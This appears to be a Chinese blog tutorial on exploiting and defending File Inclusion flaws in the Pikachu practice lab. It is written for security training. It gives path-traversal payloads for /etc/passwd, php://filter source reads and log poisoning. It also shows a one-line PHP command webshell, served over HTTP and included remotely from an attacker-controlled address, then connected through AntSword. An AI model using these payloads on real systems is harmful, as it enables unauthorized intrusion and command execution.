当前位置：首页 > article >正文

Pikachu靶场实战：File Inclusion漏洞利用与防御全解析

article 2026/3/31 6:22:40

1. File Inclusion漏洞初探从理论到靶场实战文件包含File Inclusion漏洞是Web安全领域最常见的漏洞类型之一它允许攻击者通过参数控制加载服务器上的任意文件。想象一下你家的门锁如果设计不当小偷只需要轻轻一推就能打开所有房间的门——文件包含漏洞就是这样一个危险的门锁设计缺陷。在Pikachu靶场中这个漏洞被设计得非常典型。我第一次接触这个靶场时发现它的界面简洁但暗藏玄机。页面中央那个看似无害的下拉选择框实际上就是漏洞的入口点。选择任意选项提交后细心观察地址栏就会发现关键线索——URL中的file参数正在动态加载不同文件。这里有个新手容易忽略的细节文件包含分为本地文件包含(LFI)和远程文件包含(RFI)。前者只能包含服务器本地的文件后者则可以通过URL加载远程服务器上的恶意文件。Pikachu靶场很贴心地为我们准备了这两种场景让我们可以全面掌握文件包含漏洞的利用技巧。2. 本地文件包含(LFI)实战演练2.1 初识漏洞入口打开Pikachu靶场的File Inclusion(local)页面你会看到一个简单的文件选择界面。我建议先用Burp Suite拦截一个正常请求看看参数是如何传递的。通常你会发现类似这样的URL结构http://target/vul/fileinclude/fi_local.php?filefile1.php这个file参数就是我们的突破口。在实战中我习惯先用一些基本测试确认漏洞存在file../../../../etc/passwd file./config.php如果服务器返回了这些敏感文件的内容那就确认存在LFI漏洞。2.2 参数爆破的艺术Pikachu靶场的设计很巧妙它隐藏了多个有效文件。这时候就需要用到Burp Suite的Intruder模块进行爆破。具体操作步骤拦截正常请求发送到Intruder在Positions标签页选择Sniper模式标记file参数值在Payloads标签页选择Numbers类型范围1-50步长1开始攻击并观察不同长度的响应我曾在一次测试中发现file5.php返回了异常长度的响应打开一看竟然是数据库凭证这种通过简单爆破就能发现敏感信息的案例在实际渗透测试中并不少见。2.3 进阶利用技巧除了爆破LFI还有更多高级利用方式。比如使用PHP伪协议读取源码php://filter/convert.base64-encode/resourceindex.php这个技巧在Pikachu靶场的读取源码环节会用到。Base64编码是为了避免源码被直接执行解码后我们就能看到原始PHP代码。另一个实用技巧是日志文件注入。如果服务器开放了SSH服务可以尝试包含日志文件file../../../../var/log/auth.log然后在SSH登录时故意输入PHP代码这些代码会被记录到日志中再通过LFI执行。3. 远程文件包含(RFI)深度利用3.1 搭建恶意文件服务器RFI比LFI更危险因为它允许加载远程服务器上的文件。在Pikachu靶场中我们需要先准备一个包含PHP代码的文本文件。我通常在本地用Python快速起个HTTP服务python3 -m http.server 8000然后在同目录下创建shell.php内容为?php system($_GET[cmd]); ?3.2 实现远程代码执行在靶场页面尝试包含这个远程文件http://target/vul/fileinclude/fi_remote.php?filehttp://your-ip:8000/shell.php如果配置正确现在你就可以在URL中添加cmd参数执行任意命令了cmdwhoami3.3 连接WebShell虽然命令行操作很方便但图形化WebShell更适合复杂操作。我推荐使用蚁剑(AntSword)它的文件管理、数据库操作等功能非常完善。配置时要注意连接地址填写包含漏洞的完整URL密码字段对应我们shell.php中的$_GET[cmd]编码器选择default就行第一次成功连接到WebShell看到服务器目录结构时那种成就感至今难忘。但请记住这只能在授权测试的环境中进行4. 源码读取与漏洞分析4.1 使用PHP过滤器Pikachu靶场的读取源码环节展示了如何获取漏洞页面的源代码。关键点在于使用php://filter伪协议php://filter/convert.base64-encode/resourcefi_remote.php这个技巧在我分析未知系统时特别有用。通过阅读源码不仅能理解漏洞原理还能发现更多隐藏的攻击面。4.2 Base64解码技巧获取到的Base64编码可以直接在Burp Suite的Decoder模块解码也可以用命令行echo PD9waHA... | base64 -d我习惯把解码后的内容保存为.php文件然后用语法高亮的编辑器查看这样更容易分析程序逻辑。4.3 漏洞根源分析通过阅读源码你会发现文件包含漏洞通常源于不安全的动态文件加载逻辑。比如include($_GET[file] . .php);开发者虽然加了.php后缀但通过NULL字节(%00)或路径遍历(../../../)仍可绕过限制。5. 全面防御方案5.1 输入验证与白名单最有效的防御措施是实施严格的白名单机制。比如$allowed [file1, file2, file3]; if(in_array($_GET[file], $allowed)) { include($_GET[file] . .php); } else { die(Invalid file request); }我在项目中会额外加上日志记录追踪所有非法文件包含尝试。5.2 安全配置建议PHP.ini的几个关键配置allow_url_fopen Off allow_url_include Off open_basedir /var/www/html这些配置能有效限制文件包含的范围。我每次部署新环境都会检查这些设置。5.3 代码审计要点在代码审计时我重点关注这些危险函数include()/include_once()require()/require_once()file_get_contents()fopen()任何使用这些函数动态加载文件的地方都需要严格审查。建议使用静态分析工具辅助审计但不要完全依赖工具。6. 实战经验与常见误区在实际渗透测试中文件包含漏洞往往与其他漏洞形成攻击链。比如先通过文件上传漏洞传马再用LFI执行。我遇到过一个典型案例网站限制上传.php文件但允许.jpg。攻击者上传包含PHP代码的图片文件再通过LFI执行。新手常见的几个误区忽略路径遍历测试总想着直接包含/etc/passwd却忘了尝试../../这种基本操作不检查文件权限即使包含成功也可能因为权限问题读不到内容过早放弃有些漏洞需要多次尝试不同技术组合才能利用成功建议养成系统化的测试习惯从简单测试开始逐步尝试更复杂的技术。每次测试都做好记录这对后续的漏洞分析和修复建议非常有帮助。

Pikachu靶场实战：File Inclusion漏洞利用与防御全解析

相关文章：

Pikachu靶场实战：File Inclusion漏洞利用与防御全解析

DRM驱动（三）之核心模块回调函数解析

新手别怕！用Volatility 2.6分析WinXP内存镜像，一步步揪出隐藏的svchost木马

foobar2000皮肤焕新：用foobox-cn打造沉浸式音乐体验

uView Input前后槽实战：5分钟搞定搜索框+验证码组合

Fay数字人框架终极指南：30分钟打造你的AI虚拟助手

UE5 - 动态材质与电子围栏：ArchvizExplorer与Map Border Collection的深度整合

STM32F407实战：基于CubeMX与FreeRTOS的SDIO-FatFs文件系统高效读写方案

BH1750光照传感器避坑指南：STM32的I2C通信那些事儿（附STM32F407调试心得）

深入解析GNSS信号跟踪环路：从PLL/DLL原理到Python仿真实践

保姆级避坑指南：用YOLOX和ByteTrack在Windows上实现多目标跟踪（附完整代码修改）

科哥二次开发Image-to-Video：性能提升39%，小白友好度大增

融合多尺度特征与注意力机制的YOLOv5红外小目标检测优化方案

从手机端到边缘设备：聊聊轻量化模型设计中FLOPs、MACs和Params的权衡艺术

Phi-4-mini-reasoning基础教程：理解其与Phi-4-standard在架构上的关键差异

视频硬字幕提取终极指南：用本地AI工具10倍提升你的字幕制作效率

Windows 11 离线部署 WSL2 与 Ubuntu：绕过商店限制的完整实战

Phi-4-mini-reasoning vLLM高级特性：LoRA适配器热插拔与多任务推理切换

3步解决macOS应用更新烦恼：开源神器Latest使用指南

为什么头部AI工厂已全面切换PyTorch 3.0静态图训练？揭秘2024年Q2实测吞吐提升3.8倍、成本下降41%的关键配置

Z-Image-GGUF模型Java后端集成指南：SpringBoot微服务实战

为什么92%的Java团队TCC失败？阿里P8级专家复盘6大反模式与可立即上线的加固模板

AW88195音频编解码器驱动从MTK到RK平台的移植实践

AWPortrait-Z WebUI日志诊断指南：从webui_startup.log定位90%常见问题

Octomap在二维导航地图转换中的常见问题与优化策略

告别OpenAI API费用：手把手教你用本地BGE模型+FAISS搭建LangChain私有知识库

Isaac Sim 4.1.0 国内网络环境下的三种下载与安装提速方案（含离线包处理）

AEC-Q100到AEC-Q200：汽车电子组件认证标准差异与应用场景详解

Qwen3.5-2B图文对话实战：教育场景中学生作业图题智能解析案例

阿里语音识别模型WebUI实战：一键部署，会议录音秒变文字稿